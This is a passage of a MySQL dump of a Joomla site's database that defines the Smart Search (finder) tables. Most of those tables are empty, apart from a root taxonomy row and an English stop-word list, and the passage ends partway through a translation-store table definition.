/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_filters` (
  `filter_id` int unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL,
  `created_by_alias` varchar(255) NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `map_count` int unsigned NOT NULL DEFAULT '0',
  `data` mediumtext NOT NULL,
  `params` longtext,
  PRIMARY KEY (`filter_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_filters`
--

LOCK TABLES `fz6t4_finder_filters` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links`
--

DROP TABLE IF EXISTS `fz6t4_finder_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links` (
  `link_id` int unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  `route` varchar(255) NOT NULL,
  `title` varchar(400) DEFAULT NULL,
  `description` text,
  `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `md5sum` varchar(32) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `state` int DEFAULT '1',
  `access` int DEFAULT '0',
  `language` varchar(8) NOT NULL,
  `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `list_price` double unsigned NOT NULL DEFAULT '0',
  `sale_price` double unsigned NOT NULL DEFAULT '0',
  `type_id` int NOT NULL,
  `object` mediumblob NOT NULL,
  PRIMARY KEY (`link_id`),
  KEY `idx_type` (`type_id`),
  KEY `idx_md5` (`md5sum`),
  KEY `idx_url` (`url`(75)),
  KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
  KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`),
  KEY `idx_title` (`title`(100))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links`
--

LOCK TABLES `fz6t4_finder_links` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms0`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms0`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms0` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms0`
--

LOCK TABLES `fz6t4_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms0` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms1`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms1`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms1` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms1`
--

LOCK TABLES `fz6t4_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms1` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms2`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms2`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms2` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms2`
--

LOCK TABLES `fz6t4_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms2` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms3`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms3` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms3`
--

LOCK TABLES `fz6t4_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms3` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms4`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms4`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms4` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms4`
--

LOCK TABLES `fz6t4_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms4` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms5`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms5`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms5` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms5`
--

LOCK TABLES `fz6t4_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms5` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms6`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms6`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms6` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms6`
--

LOCK TABLES `fz6t4_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms6` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms7`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms7` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms7`
--

LOCK TABLES `fz6t4_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms7` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms8`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms8`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms8` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms8`
--

LOCK TABLES `fz6t4_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms8` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_terms9`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_terms9`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_terms9` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_terms9`
--

LOCK TABLES `fz6t4_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms9` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termsa`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termsa`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termsa` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termsa`
--

LOCK TABLES `fz6t4_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsa` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termsb`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termsb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termsb` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termsb`
--

LOCK TABLES `fz6t4_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsb` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termsc`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termsc`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termsc` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termsc`
--

LOCK TABLES `fz6t4_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsc` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termsd`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termsd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termsd` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termsd`
--

LOCK TABLES `fz6t4_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsd` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termse`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termse`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termse` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termse`
--

LOCK TABLES `fz6t4_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termse` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_links_termsf`
--

DROP TABLE IF EXISTS `fz6t4_finder_links_termsf`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_links_termsf` (
  `link_id` int unsigned NOT NULL,
  `term_id` int unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_links_termsf`
--

LOCK TABLES `fz6t4_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsf` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_taxonomy`
--

DROP TABLE IF EXISTS `fz6t4_finder_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_taxonomy` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `state` tinyint unsigned NOT NULL DEFAULT '1',
  `access` tinyint unsigned NOT NULL DEFAULT '0',
  `ordering` tinyint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `parent_id` (`parent_id`),
  KEY `state` (`state`),
  KEY `ordering` (`ordering`),
  KEY `access` (`access`),
  KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_taxonomy`
--

LOCK TABLES `fz6t4_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_taxonomy` DISABLE KEYS */;
INSERT INTO `fz6t4_finder_taxonomy` VALUES (1,0,'ROOT',0,0,0);
/*!40000 ALTER TABLE `fz6t4_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_taxonomy_map`
--

DROP TABLE IF EXISTS `fz6t4_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_taxonomy_map` (
  `link_id` int unsigned NOT NULL,
  `node_id` int unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`node_id`),
  KEY `link_id` (`link_id`),
  KEY `node_id` (`node_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_taxonomy_map`
--

LOCK TABLES `fz6t4_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_taxonomy_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_terms`
--

DROP TABLE IF EXISTS `fz6t4_finder_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_terms` (
  `term_id` int unsigned NOT NULL AUTO_INCREMENT,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '0',
  `soundex` varchar(75) NOT NULL,
  `links` int NOT NULL DEFAULT '0',
  `language` char(3) NOT NULL DEFAULT '',
  PRIMARY KEY (`term_id`),
  UNIQUE KEY `idx_term` (`term`),
  KEY `idx_term_phrase` (`term`,`phrase`),
  KEY `idx_stem_phrase` (`stem`,`phrase`),
  KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_terms`
--

LOCK TABLES `fz6t4_finder_terms` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_terms` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_terms_common`
--

DROP TABLE IF EXISTS `fz6t4_finder_terms_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_terms_common` (
  `term` varchar(75) NOT NULL,
  `language` varchar(3) NOT NULL,
  KEY `idx_word_lang` (`term`,`language`),
  KEY `idx_lang` (`language`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_terms_common`
--

LOCK TABLES `fz6t4_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_terms_common` DISABLE KEYS */;
INSERT INTO `fz6t4_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `fz6t4_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_tokens`
--

DROP TABLE IF EXISTS `fz6t4_finder_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '1',
  `context` tinyint unsigned NOT NULL DEFAULT '2',
  `language` char(3) NOT NULL DEFAULT '',
  KEY `idx_word` (`term`),
  KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_tokens`
--

LOCK TABLES `fz6t4_finder_tokens` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_tokens_aggregate`
--

DROP TABLE IF EXISTS `fz6t4_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_tokens_aggregate` (
  `term_id` int unsigned NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint unsigned NOT NULL DEFAULT '0',
  `term_weight` float unsigned NOT NULL,
  `context` tinyint unsigned NOT NULL DEFAULT '2',
  `context_weight` float unsigned NOT NULL,
  `total_weight` float unsigned NOT NULL,
  `language` char(3) NOT NULL DEFAULT '',
  KEY `token` (`term`),
  KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_tokens_aggregate`
--

LOCK TABLES `fz6t4_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_finder_types`
--

DROP TABLE IF EXISTS `fz6t4_finder_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_finder_types` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `mime` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `title` (`title`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_finder_types`
--

LOCK TABLES `fz6t4_finder_types` WRITE;
/*!40000 ALTER TABLE `fz6t4_finder_types` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_finder_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_jd_store`
--

DROP TABLE IF EXISTS `fz6t4_jd_store`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_jd_store` (
  `idJdStore` int NOT NULL AUTO_INCREMENT,
  `idLang` tinyint NOT NULL COMMENT 'language id #__languages',
  `idReference` int NOT NULL COMMENT 'Primary key for translation',
  `referenceTable` varchar(67) NOT NULL COMMENT 'Table of the translation',
  `referenceOption` varchar(50) NOT NULL,
  `referenceView` varchar(50) NOT NULL,
  `referenceLayout` varchar(50) NOT NULL,
  `sourcehash` varchar(32) NOT NULL,
